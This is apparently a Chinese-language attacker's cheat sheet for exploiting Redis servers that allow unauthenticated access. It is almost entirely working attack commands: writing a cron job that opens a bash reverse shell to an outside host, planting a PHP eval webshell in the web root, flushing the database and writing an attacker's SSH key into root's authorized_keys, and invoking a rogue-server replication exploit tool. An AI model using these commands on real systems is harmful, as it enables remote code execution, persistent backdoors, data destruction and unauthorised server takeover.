未授權無需認證訪問內部數據庫。
利用計划任務反彈shell
redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save
獲取webshell
config set dir /var/www/html/ config set dbfilename shell.php set x "<?php @eval($_POST['test']);?>" save
寫入公鑰遠程連接
利用條件:root用戶,未授權訪問,開啟ssh服務
1. 事先先准備好自己的公鑰,寫入一個本地文件foo.txt。 $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt 2. 通過redis將該文件寫入內存 $ redis-cli -h 192.168.1.11 flushall $ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit 3. 利用redis-cli 寫入配置的方式將公鑰寫入到.ssh目錄下 $ redis-cli -h 192.168.1.11 192.168.1.11:6379> config set dir /Users/antirez/.ssh/ OK 192.168.1.11:6379> config get dir 1) "dir" 2) "/Users/antirez/.ssh" 192.168.1.11:6379> config set dbfilename "authorized_keys" OK 192.168.1.11:6379> save OK 4.公鑰登陸 ssh -i redis.pub root@192.168.192.133
主從復制漏洞:
paper:https://paper.seebug.org/975/
漏洞利用exp:
github:https://github.com/AdministratorGithub/redis-rogue-server
python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port>